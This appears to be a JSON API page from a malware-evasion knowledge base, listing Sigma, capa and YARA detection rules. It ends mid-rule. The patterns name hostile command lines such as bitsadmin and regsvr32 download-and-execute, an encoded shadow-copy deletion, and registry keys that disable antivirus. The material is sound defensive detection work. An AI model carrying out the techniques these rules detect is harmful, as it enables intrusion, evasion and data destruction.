GET /api/detection_rules/
HTTP 200 OK
Allow: GET, POST, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "count": 56,
    "next": "https://search.unprotect.it/api/detection_rules/?page=2",
    "previous": null,
    "results": [
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "Anti_vm",
            "rule": "title: AntiVM\r\nstatus: experimental\r\ndescription: Detect virtual environment \"VirtualBox|VMware|KVM|HVM\"  \r\nauthor: Joe Security\r\ndate: 2019-11-06\r\nid: 200020\r\nthreatname:\r\nbehaviorgroup: 5\r\nclassification: 8\r\nmitreattack: T1497\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*IlZpcnR1YWxCb3h8Vk13YXJlfEtWTXxIVk0i*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "base64_download",
            "rule": "title: Powershell download file from base64 url\r\nstatus: experimental\r\ndescription: Powershell download file from base64 url\r\nauthor: Joe Security\r\ndate: 2020-04-13\r\nid: 200072\r\nthreatname:\r\nbehaviorgroup: 1\r\nclassification: 8\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:\r\n          CommandLine:\r\n              - '*.downloadfile([system.text.encoding]::ascii.getstring([system.convert]::frombase64string(*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "bitsadmin",
            "rule": "title: bitsadmin download and execute\r\nstatus: experimental\r\ndescription: Detect bitsadmin download and execute activity\r\nauthor: Joe Security\r\ndate: 2019-11-25\r\nid: 200031\r\nthreatname:\r\nbehaviorgroup: 1\r\nclassification: 8\r\nmitreattack: \r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*bitsadmin /transfer*http*start %APPDATA%*'\r\n              - '*/transfer*http*.dll&& rundll32*'\r\n              - '*powershell*start-bitstransfer*start-process*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "bypass_applocker",
            "rule": "title: AppLocker Bypass via Regsvr32\r\nstatus: experimental\r\ndescription: AppLocker Bypass via Regsvr32\r\nauthor: Joe Security\r\ndate: 2020-03-04\r\nid: 200059\r\nthreatname:\r\nbehaviorgroup: 5\r\nclassification: 8\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*regsvr32*/s /u /n /i:http*scrobj*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "capa_debugger_api",
            "rule": "rule:\r\n  meta:\r\n    name: check for debugger via API\r\n    namespace: anti-analysis/anti-debugging/debugger-detection\r\n    author: michael.hunhoff@fireeye.com\r\n    scope: function\r\n    mbc:\r\n      - Anti-Behavioral Analysis::Debugger Detection::CheckRemoteDebuggerPresent [B0001.002]\r\n      - Anti-Behavioral Analysis::Debugger Detection::WudfIsAnyDebuggerPresent [B0001.031]\r\n    references:\r\n      - https://github.com/LordNoteworthy/al-khaser/blob/master/al-khaser/AntiDebug/CheckRemoteDebuggerPresent.cpp\r\n    examples:\r\n      - al-khaser_x86.exe_:0x420000\r\n  features:\r\n    - or:\r\n      - api: kernel32.CheckRemoteDebuggerPresent\r\n      - api: WUDFPlatform.WudfIsAnyDebuggerPresent\r\n      - api: WUDFPlatform.WudfIsKernelDebuggerPresent\r\n      - api: WUDFPlatform.WudfIsUserDebuggerPresent"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "check_external_ip",
            "rule": "title: Check external IP via Powershell\r\nstatus: experimental\r\ndescription: Check external IP via Powershell\r\nauthor: Joe Security\r\ndate: 2020-07-20\r\nid: 200081\r\nthreatname:\r\nbehaviorgroup: 8\r\nclassification: 6\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*powershell*api.ipify.org*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "Check for Sandbox and AV Modules",
            "rule": "rule:\r\n  meta:\r\n    name: check for sandbox and av modules\r\n    namespace: anti-analysis/anti-av\r\n    author: \"@_re_fox\"\r\n    scope: basic block\r\n    unprotect: U0508\r\n    mbc:\r\n      - Anti-Behavioral Analysis::Virtual Machine Detection [B0009]\r\n      - Anti-Behavioral Analysis::Sandbox Detection [B0007]\r\n    examples:\r\n      - ccbf7cba35bab56563c0fbe4237fdc41:0x0040a4a0\r\n  features:\r\n    - and:\r\n      - api: GetModuleHandle\r\n      - or:\r\n        - string: /avghook(x|a)\\.dll/i\r\n          description: AVG\r\n        - string: /snxhk\\.dll/i \r\n          description: Avast\r\n        - string: /sf2\\.dll/i \r\n          description: Avast\r\n        - string: /sbiedll\\.dll/i\r\n          description: Sandboxie\r\n        - string: /dbghelp\\.dll/i \r\n          description: WindBG\r\n        - string: /api_log\\.dll/i \r\n          description: iDefense Lab\r\n        - string: /dir_watch\\.dll/ \r\n          description: iDefense Lab\r\n        - string: /pstorec\\.dll/i\r\n          description: SunBelt Sandbox\r\n        - string: /vmcheck\\.dll/i\r\n          description: Virtual PC\r\n        - string: /wpespy\\.dll/i\r\n          description: WPE Pro\r\n        - string: /cmdvrt(64|32).dll/i \r\n          description: Comodo Container\r\n        - string: /sxin.dll/i \r\n          description: 360 SOFTWARE\r\n        - string: /dbghelp\\.dll/i\r\n          description: WINE\r\n        - string: /printfhelp\\.dll/i \r\n          description: Unknown Sandbox"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/1/",
            "name": "Checks for QEMU Registry Key",
            "rule": "rule Qemu_Detection\r\n{\r\n\tmeta:\r\n\t\tAuthor = \"Thomas Roccia - @fr0gger_ - Unprotect Project\"\r\n\t\tDescription = \"Checks for QEMU Registry Key\"\r\n\tstrings:\r\n\t\t$desc1 = \"HARDWARE\\\\Description\\\\System\" nocase wide ascii\r\n\t\t$desc2 = \"SystemBiosVersion\" nocase wide ascii\r\n\t\t$desc3 = \"QEMU\" wide nocase ascii\r\n\r\n\t\t$dev1 = \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 0\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\" nocase wide ascii\r\n\t\t$dev2 = \"Identifier\" nocase wide ascii\r\n\t\t$dev3 = \"QEMU\" wide nocase ascii\r\n\tcondition:\r\n\t\tany of ($desc*) or any of ($dev*)\r\n}"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/1/",
            "name": "Checks for VBOX Registry Key",
            "rule": "rule VBox_Detection\r\n{\r\n\tmeta:\r\n\t\tAuthor = \"Thomas Roccia - @fr0gger_ - Unprotect Project\"\r\n\t\tDescription = \"Checks for VBOX Registry Key\"\r\n\tstrings:\r\n\t\t$desc1 = \"HARDWARE\\\\Description\\\\System\" nocase wide ascii\r\n\t\t$desc2 = \"SystemBiosVersion\" nocase wide ascii\r\n\t\t$desc3 = \"VideoBiosVersion\" nocase wide ascii\r\n\r\n\t\t$data1 = \"VBOX\" nocase wide ascii\r\n\t\t$data2 = \"VIRTUALBOX\" nocase wide ascii\r\n\t\t\r\n\t\t$dev1 = \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 0\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\" nocase wide ascii\r\n\t\t$dev2 = \"Identifier\" nocase wide ascii\r\n\t\t$dev3 = \"VBOX\" nocase wide ascii\r\n\r\n\t\t$soft1 = \"SOFTWARE\\\\Oracle\\\\VirtualBox Guest Additions\"\r\n\t\t$soft2 = \"HARDWARE\\\\ACPI\\\\DSDT\\\\VBOX__\"\r\n\t\t$soft3 = \"HARDWARE\\\\ACPI\\\\FADT\\\\VBOX__\"\r\n\t\t$soft4 = \"HARDWARE\\\\ACPI\\\\RSDT\\\\VBOX__\"\r\n\t\t$soft5 = \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxGuest\"\r\n\t\t$soft6 = \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxService\"\r\n\t\t$soft7 = \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxMouse\"\r\n\t\t$soft8 = \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxVideo\"\r\n\r\n\t\t$virtualbox1 = \"VBoxHook.dll\" nocase\r\n\t        $virtualbox2 = \"VBoxService\" nocase\r\n        \t$virtualbox3 = \"VBoxTray\" nocase\r\n        \t$virtualbox4 = \"VBoxMouse\" nocase\r\n        \t$virtualbox5 = \"VBoxGuest\" nocase\r\n        \t$virtualbox6 = \"VBoxSF\" nocase\r\n        \t$virtualbox7 = \"VBoxGuestAdditions\" nocase\r\n        \t$virtualbox8 = \"VBOX HARDDISK\"  nocase\r\n        \t$virtualbox9 = \"VBoxVideo\" nocase\r\n\t\t$virtualbox10 = \"vboxhook\" nocase\r\n\t\t$virtualbox11 = \"vboxmrxnp\" nocase\r\n\t\t$virtualbox12 = \"vboxogl\" nocase\r\n\t\t$virtualbox13 = \"vboxoglarrayspu\" nocase\r\n\t\t$virtualbox14 = \"vboxoglcrutil\"\r\n\t\t$virtualbox15 = \"vboxoglerrorspu\" nocase\r\n\t\t$virtualbox16 = \"vboxoglfeedbackspu\" nocase\r\n\t\t$virtualbox17 = \"vboxoglpackspu\" nocase\r\n\t\t$virtualbox18 = \"vboxoglpassthroughspu\" nocase\r\n\t\t$virtualbox19 = \"vboxcontrol\" nocase\r\n\r\n        \t// VirtualBox Mac Address\r\n        \t$virtualbox_mac_1a = \"08-00-27\"\r\n        \t$virtualbox_mac_1b = \"08:00:27\"\r\n        \t$virtualbox_mac_1c = \"080027\"\t\r\n\tcondition:\r\n\t\tany of ($desc*) and \r\n\t\t1 of ($data*) or \r\n\t\tany of ($dev*) or \r\n\t\tany of ($soft*) or\r\n\t\tany of ($virtualbox*)\r\n}"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "clear_log",
            "rule": "rule:\r\n  meta:\r\n    name: clear the Windows event log\r\n    namespace: anti-analysis/anti-forensic/clear-logs\r\n    author: michael.hunhoff@fireeye.com\r\n    scope: basic block\r\n    att&ck:\r\n      - Defense Evasion::Indicator Removal on Host::Clear Windows Event Logs [T1070.001]\r\n    examples:\r\n      - 82BF6347ACF15E5D883715DC289D8A2B:0x14005E0C0\r\n  features:\r\n    - and:\r\n      - api: advapi32.ElfClearEventLogFile\r\n      - optional:\r\n        - api: advapi32.OpenEventLog"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "crash_eventlog",
            "rule": "rule:\r\n  meta:\r\n    name: crash the Windows event logging service\r\n    namespace: anti-analysis/anti-forensic\r\n    author: michael.hunhoff@fireeye.com\r\n    scope: basic block\r\n    att&ck:\r\n      - Defense Evasion::Impair Defenses::Disable Windows Event Logging [T1562.002]\r\n    references:\r\n      - https://github.com/limbenjamin/LogServiceCrash\r\n    examples:\r\n      - 82BF6347ACF15E5D883715DC289D8A2B:0x14005E0C0\r\n  features:\r\n    - and:\r\n      - count(api(advapi32.ElfClearEventLogFileW)): 3 or more\r\n      - count(api(advapi32.OpenEventLogA)): 1 or more"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "debugged_flag",
            "rule": "rule:\r\n  meta:\r\n    name: check for PEB BeingDebugged flag\r\n    namespace: anti-analysis/anti-debugging/debugger-detection\r\n    author: moritz.raabe@fireeye.com\r\n    scope: basic block\r\n    mbc:\r\n      - Anti-Behavioral Analysis::Debugger Detection::Process Environment Block BeingDebugged [B0001.035]\r\n    references:\r\n      - Practical Malware Analysis, Chapter 16, p. 353\r\n    examples:\r\n      - Practical Malware Analysis Lab 16-01.exe_:0x403530\r\n  features:\r\n    - and:\r\n      - match: PEB access\r\n      - offset: 2 = PEB.BeingDebugged"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/1/",
            "name": "DebuggerCheck__GlobalFlags",
            "rule": "rule DebuggerCheck__GlobalFlags  {\r\n    meta:\r\n\tdescription = \"Rule to detect NtGlobalFlags debugger check\"\r\n        author = \"Thibault Seret\"\r\n        date = \"2020-09-26\"\r\n    strings:\r\n        $s1 = \"NtGlobalFlags\"\r\n    condition:\r\n        any of them\r\n}"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/1/",
            "name": "DebuggerCheck__RemoteAPI",
            "rule": "rule DebuggerCheck__RemoteAPI {\r\n    meta:\r\n        description = \"Rule to RemoteAPI debugger check\"\r\n        author = \"Thibault Seret\"\r\n        date = \"2020-09-26\"\r\n    strings:\r\n        $s1 =\"CheckRemoteDebuggerPresent\"\r\n    condition:\r\n        any of them"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "debug_register",
            "rule": "rule:\r\n  meta:\r\n    name: check for hardware breakpoints\r\n    namespace: anti-analysis/anti-debugging/debugger-detection\r\n    author: michael.hunhoff@fireeye.com\r\n    scope: function\r\n    mbc:\r\n      - Anti-Behavioral Analysis::Debugger Detection::Hardware Breakpoints [B0001.005]\r\n    references:\r\n      - https://github.com/LordNoteworthy/al-khaser/blob/master/al-khaser/AntiDebug/HardwareBreakpoints.cpp\r\n    examples:\r\n      - al-khaser_x86.exe_:0x42035D\r\n  features:\r\n    - and:\r\n      - api: kernel32.GetThreadContext\r\n      - number: 0x10010 = CONTEXT_DEBUG_REGISTERS\r\n      - offset: 0x4 = DR0\r\n      - offset: 0x8 = DR1\r\n      - offset: 0xC = DR2\r\n      - offset: 0x10 = DR3\r\n      - count(mnemonic(cmp)): 4 or more"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "decode_string_findstr",
            "rule": "title: Decode strings from lnk via findstr.exe\r\nstatus: experimental\r\ndescription: uses findstr.exe to decode strings from lnk file\r\nauthor: Joe Security\r\ndate: 2019-11-11\r\nid: 200024\r\nthreatname:\r\nbehaviorgroup: 1\r\nclassification: 8\r\nmitreattack: \r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*findstr /b /i *.lnk*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "delete_shadow_copy",
            "rule": "title: Delete Shadow Copy Via Powershell\r\nstatus: experimental\r\ndescription: Delete Shadow Copy Via Powershell\r\nauthor: Joe Security\r\ndate: 2019-10-25\r\nid: 200011\r\nthreatname:\r\nbehaviorgroup: 18\r\nclassification: 8\r\nmitreattack: T1490\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*powershell*RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/1/",
            "name": "Detect_AntiVMWithTemperature",
            "rule": "rule Detect_AntiVMWithTemperature {\r\n    meta:\r\n        description = \"Rue to detect AntiVMwithTemperature technique\"\r\n        author = \"Thibault Seret\"\r\n        date = \"2020-09-26\"\r\n    strings:\r\n        $s1 = {72 6f 6f 74 5c 57 4d 49}\r\n        // root\\WMI\r\n        $s2 = {53 45 4c 45 43 54 20 2a 20 46 52 4f 4d 20 4d 53 41 63 70 69 5f 54 68 65 72 6d 61 6c 5a 6f 6e 65 54 65 6d 70 65 72 61 74 75 72 65}\r\n        // SELECT * FROM MSAcpi_ThermalZoneTemperature\r\n        $s3 = {43 75 72 72 65 6e 74 54 65 6d 70 65 72 61 74 75 72 65}\r\n        //  CurrentTemperature\r\n    \r\n    condition:\r\n    all of them"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "detect_region",
            "rule": "title: Geofenced Ru\r\nstatus: experimental\r\ndescription: Detect region and exit if matched with harcoded country list Get-UICulture).Name -match \"CN|RO|RU|UA|BY \r\nauthor: Joe Security\r\ndate: 2019-11-06\r\nid: 200019\r\nthreatname:\r\nbehaviorgroup: 8\r\nclassification: 8\r\nmitreattack: T1241\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*R2V0LVVJQ3VsdHVyZSkuTmFtZSAtbWF0Y2ggIkNOfFJPfFJVfFVBfEJZI*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/1/",
            "name": "detect_tlscallback",
            "rule": "rule detect_tlscallback {\r\n    meta:\r\n        description = \"Simple rule to detect tls callback as anti-debug.\"\r\n        author = \"Thomas Roccia | @fr0gger_\"\r\n    strings:\r\n        $str1 = \"TLS_CALLBACK\" nocase\r\n        $str2 = \"TLScallback\" nocase\r\n    condition:\r\n        uint32(uint32(0x3C)) == 0x4550 and any of them\r\n}"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "detect_vm_process",
            "rule": "rule:\r\n  meta:\r\n    name: check for windows sandbox via process name\r\n    namespace: anti-analysis/anti-vm/vm-detection\r\n    author: \"@_re_fox\"\r\n    scope: function\r\n    att&ck:\r\n      - Defense Evasion::Virtualization/Sandbox Evasion::System Checks [T1497.001]\r\n    mbc:\r\n      - Anti-Behavioral Analysis::Virtual Machine Detection [B0009]\r\n    references:\r\n      - https://github.com/LloydLabs/wsb-detect\r\n    examples:\r\n      - 773290480d5445f11d3dc1b800728966:0x140001140\r\n  features:\r\n    - and:\r\n      - match: enumerate processes\r\n      - string: CExecSvc.exe"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "device_pipe",
            "rule": "rule:\r\n  meta:\r\n    name: check for windows sandbox via device\r\n    namespace: anti-analysis/anti-vm/vm-detection\r\n    author: \"@_re_fox\"\r\n    scope: basic block\r\n    att&ck:\r\n      - Defense Evasion::Virtualization/Sandbox Evasion::System Checks [T1497.001]\r\n    mbc:\r\n      - Anti-Behavioral Analysis::Virtual Machine Detection [B0009]\r\n    references:\r\n      - https://github.com/LloydLabs/wsb-detect\r\n    examples:\r\n      - 773290480d5445f11d3dc1b800728966:0x140001140\r\n  features:\r\n    - and:\r\n      - api: CreateFile\r\n      - string: \\\\.\\GLOBALROOT\\device\\vmsmb"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/1/",
            "name": "disable_antivirus",
            "rule": "import \"pe\"\r\n\r\nrule disable_antivirus \r\n{\r\n    meta:\r\n\tauthor = \"x0r\"\r\n\tdescription = \"Disable AntiVirus\"\r\n\r\n    strings:\r\n        $p1 = \"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\DisallowRun\" nocase\r\n        $p2 = \"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\\" nocase\r\n        $p3 = \"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\" nocase\r\n\r\n        $c1 = \"RegSetValue\" \r\n\r\n        $r1 = \"AntiVirusDisableNotify\" \r\n        $r2 = \"DontReportInfectionInformation\" \r\n        $r3 = \"DisableAntiSpyware\" \r\n        $r4 = \"RunInvalidSignatures\" \r\n        $r5 = \"AntiVirusOverride\" \r\n        $r6 = \"CheckExeSignatures\"\r\n\r\n        $f1 = \"blackd.exe\" nocase\r\n        $f2 = \"blackice.exe\" nocase\r\n        $f3 = \"lockdown.exe\" nocase\r\n        $f4 = \"lockdown2000.exe\" nocase\r\n        $f5 = \"taskkill.exe\" nocase\r\n        $f6 = \"tskill.exe\" nocase\r\n        $f7 = \"smc.exe\" nocase\r\n        $f8 = \"sniffem.exe\" nocase\r\n        $f9 = \"zapro.exe\" nocase\r\n        $f10 = \"zlclient.exe\" nocase\r\n        $f11 = \"zonealarm.exe\" nocase\r\n\r\n    condition:\r\n        ($c1 and $p1 and 1 of ($f*)) or ($c1 and $p2) or 1 of ($r*) or $p3\r\n}"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/1/",
            "name": "Findcrypt",
            "rule": "/*\r\n    from https://github.com/Yara-Rules/rules/tree/master/Crypto\r\n    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.\r\n*/\r\nrule Big_Numbers0\r\n{\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Looks for big numbers 20:sized\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = /[0-9a-fA-F]{20}/ fullword ascii\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Big_Numbers1\r\n{\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Looks for big numbers 32:sized\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = /[0-9a-fA-F]{32}/ fullword wide ascii\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Big_Numbers2\r\n{\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Looks for big numbers 48:sized\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = /[0-9a-fA-F]{48}/ fullword wide ascii\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Big_Numbers3\r\n{\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Looks for big numbers 64:sized\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n        \t$c0 = /[0-9a-fA-F]{64}/ fullword wide ascii\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Big_Numbers4\r\n{\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Looks for big numbers 128:sized\"\r\n\t\tdate = \"2016-08\"\r\n\tstrings:\r\n        \t$c0 = /[0-9a-fA-F]{128}/ fullword wide ascii\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Big_Numbers5\r\n{\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Looks for big numbers 256:sized\"\r\n\t\tdate = \"2016-08\"\r\n\tstrings:\r\n        \t$c0 = /[0-9a-fA-F]{256}/ fullword wide ascii\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Prime_Constants_char {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"List of primes [char]\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = { 03 05 07 0B 0D 11 13 17 1D 1F 25 29 2B 2F 35 3B 3D 43 47 49 4F 53 59 61 65 67 6B 6D 71 7F 83 89 8B 95 97 9D A3 A7 AD B3 B5 BF C1 C5 C7 D3 DF E3 E5 E9 EF F1 FB }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Prime_Constants_long {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"List of primes [long]\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = { 03 00 00 00 05 00 00 00 07 00 00 00 0B 00 00 00 0D 00 00 00 11 00 00 00 13 00 00 00 17 00 00 00 1D 00 00 00 1F 00 00 00 25 00 00 00 29 00 00 00 2B 00 00 00 2F 00 00 00 35 00 00 00 3B 00 00 00 3D 00 00 00 43 00 00 00 47 00 00 00 49 00 00 00 4F 00 00 00 53 00 00 00 59 00 00 00 61 00 00 00 65 00 00 00 67 00 00 00 6B 00 00 00 6D 00 00 00 71 00 00 00 7F 00 00 00 83 00 00 00 89 00 00 00 8B 00 00 00 95 00 00 00 97 00 00 00 9D 00 00 00 A3 00 00 00 A7 00 00 00 AD 00 00 00 B3 00 00 00 B5 00 00 00 BF 00 00 00 C1 00 00 00 C5 00 00 00 C7 00 00 00 D3 00 00 00 DF 00 00 00 E3 00 00 00 E5 00 00 00 E9 00 00 00 EF 00 00 00 F1 00 00 00 FB 00 00 00 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\n\r\nrule Advapi_Hash_API {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Looks for advapi API functions\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$advapi32 = \"advapi32.dll\" wide ascii nocase\r\n\t\t$CryptCreateHash = \"CryptCreateHash\" wide ascii\r\n\t\t$CryptHashData = \"CryptHashData\" wide ascii\r\n\t\t$CryptAcquireContext = \"CryptAcquireContext\" wide ascii\r\n\tcondition:\r\n\t\t$advapi32 and ($CryptCreateHash and $CryptHashData and $CryptAcquireContext)\r\n}\r\n\r\nrule Crypt32_CryptBinaryToString_API {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Looks for crypt32 CryptBinaryToStringA function\"\r\n\t\tdate = \"2016-08\"\r\n\tstrings:\r\n\t\t$crypt32 = \"crypt32.dll\" wide ascii nocase\r\n\t\t$CryptBinaryToStringA = \"CryptBinaryToStringA\" wide ascii\r\n\tcondition:\r\n\t\t$crypt32 and ($CryptBinaryToStringA)\r\n}\r\n\r\nrule CRC32c_poly_Constant {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for CRC32c (Castagnoli) [poly]\"\r\n\t\tdate = \"2016-08\"\r\n\tstrings:\r\n\t\t$c0 = { 783BF682 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule CRC32_poly_Constant {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for CRC32 [poly]\"\r\n\t\tdate = \"2015-05\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 2083B8ED }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule CRC32_table {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for CRC32 table\"\r\n\t\tdate = \"2015-05\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 00 00 00 00 96 30 07 77 2C 61 0E EE BA 51 09 99 19 C4 6D 07 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule CRC32_table_lookup {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"CRC32 table lookup\"\r\n\t\tdate = \"2015-06\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 8B 54 24 08 85 D2 7F 03 33 C0 C3 83 C8 FF 33 C9 85 D2 7E 29 56 8B 74 24 08 57 8D 9B 00 00 00 00 0F B6 3C 31 33 F8 81 E7 FF 00 00 00 C1 E8 08 33 04 BD ?? ?? ?? ?? 41 3B CA 7C E5 5F 5E F7 D0 C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule CRC32b_poly_Constant {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for CRC32b [poly]\"\r\n\t\tdate = \"2016-04\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { B71DC104 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\n\r\nrule CRC16_table {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for CRC16 table\"\r\n\t\tdate = \"2016-04\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 00 00 21 10 42 20 63 30 84 40 A5 50 C6 60 E7 70 08 81 29 91 4A A1 6B B1 8C C1 AD D1 CE E1 EF F1 31 12 10 02 73 32 52 22 B5 52 94 42 F7 72 D6 62 39 93 18 83 7B B3 5A A3 BD D3 9C C3 FF F3 DE E3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\n\r\nrule FlyUtilsCnDES_ECB_Encrypt {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for FlyUtils.CnDES Encrypt ECB function\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 E8 53 56 57 33 DB 89 5D E8 89 5D EC 8B D9 89 55 F8 89 45 FC 8B 7D 08 8B 75 20 8B 45 FC E8 ?? ?? ?? ?? 8B 45 F8 E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 80 7D 18 00 74 1A 0F B6 55 18 8D 4D EC 8B 45 F8 E8 ?? ?? ?? ?? 8B 55 EC 8D 45 F8 E8 ?? ?? ?? ?? 80 7D 1C 00 74 1A 0F B6 55 1C 8D 4D E8 8B 45 FC E8 ?? ?? ?? ?? 8B 55 E8 8D 45 FC E8 ?? ?? ?? ?? 85 DB 75 07 E8 ?? ?? ?? ?? 8B D8 85 F6 75 07 E8 ?? ?? ?? ?? 8B F0 53 6A 00 8B 4D FC B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 F4 33 